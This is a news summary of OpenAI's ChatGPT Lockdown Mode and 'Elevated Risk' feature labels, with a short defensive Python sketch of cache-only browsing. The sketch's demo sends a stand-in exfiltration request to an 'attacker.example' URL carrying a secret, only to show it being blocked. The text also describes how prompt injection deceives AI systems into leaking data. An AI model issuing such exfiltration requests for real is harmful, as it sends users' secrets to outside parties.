- As AI systems increasingly connect to the web and external apps, the risk of prompt injection grows: attackers can embed malicious instructions in content the model reads in order to deceive the system or exfiltrate sensitive data.
- OpenAI has introduced Lockdown Mode in ChatGPT, an advanced, optional security mode for high-risk users such as executives and security teams.
- Lockdown Mode strictly limits how ChatGPT interacts with external systems to prevent data leakage via prompt injection.
- For example, when Lockdown Mode is enabled, web browsing only uses cached content and does not send direct network requests outside the OpenAI system.
- Features whose data safety cannot be guaranteed at a deterministic level are disabled entirely.
- Lockdown Mode is available on the ChatGPT Enterprise, Edu, Healthcare, and Teachers plans; administrators can enable it in Workspace Settings and apply it to specific roles.
- Admins can granularly control which apps and actions are permitted in Lockdown Mode, while the Compliance API and logs provide monitoring of app usage and shared data.
- OpenAI plans to expand Lockdown Mode to individual users in the coming months.
- At the same time, the company is standardizing an “Elevated Risk” label for features that may pose cyber risks in ChatGPT, ChatGPT Atlas, and Codex.
- For instance, in Codex, when granting an agent internet access, the system displays an Elevated Risk warning explaining the security changes and potential hazards.
- Once security measures are sufficiently robust, OpenAI will remove the Elevated Risk label from the corresponding features.
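The cache-only browsing behavior described above can be sketched as a simple policy: under lockdown, tool calls may read pre-fetched cached content, but any attempt at a live network request is refused, so injected instructions cannot trigger outbound traffic. This is a minimal hypothetical illustration (the `browse`, `CACHED_PAGES`, and `NetworkBlockedError` names are assumptions), not OpenAI's actual implementation.

```python
# Hypothetical cache of pre-fetched, trusted pages (illustrative only).
CACHED_PAGES = {
    "https://example.com/docs": "Example Domain documentation (cached copy).",
}

class NetworkBlockedError(Exception):
    """Raised when a tool call would leave the cached snapshot."""

def browse(url: str, lockdown: bool = True) -> str:
    """Return page text; in lockdown, never fall back to the live web."""
    if url in CACHED_PAGES:
        # Served from cache: no request leaves the system.
        return CACHED_PAGES[url]
    if lockdown:
        # A cache miss is refused outright, so a prompt-injected URL
        # (e.g. an attacker's exfiltration endpoint) is never contacted.
        raise NetworkBlockedError(f"live fetch refused under lockdown: {url}")
    return live_fetch(url)  # normal mode would fetch over the network

def live_fetch(url: str) -> str:
    # Stub for the non-lockdown path; out of scope for this sketch.
    raise NotImplementedError

print(browse("https://example.com/docs"))
try:
    browse("https://attacker.example/exfiltrate?secret=abc")
except NetworkBlockedError as e:
    print("blocked:", e)
```

The key property is that the refusal is deterministic: it does not depend on the model noticing the injection, which matches the announcement's point that features are disabled when safety cannot be guaranteed at a deterministic level.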
📌 Conclusion: OpenAI adds Lockdown Mode to limit network interactions and prevent data leakage via prompt injection, specifically for enterprises and high-risk groups. Meanwhile, the Elevated Risk label helps users identify features with security risks when connecting to the web or apps. This is a step toward enhancing transparency and control as AI becomes more integrated with infrastructure and sensitive data.
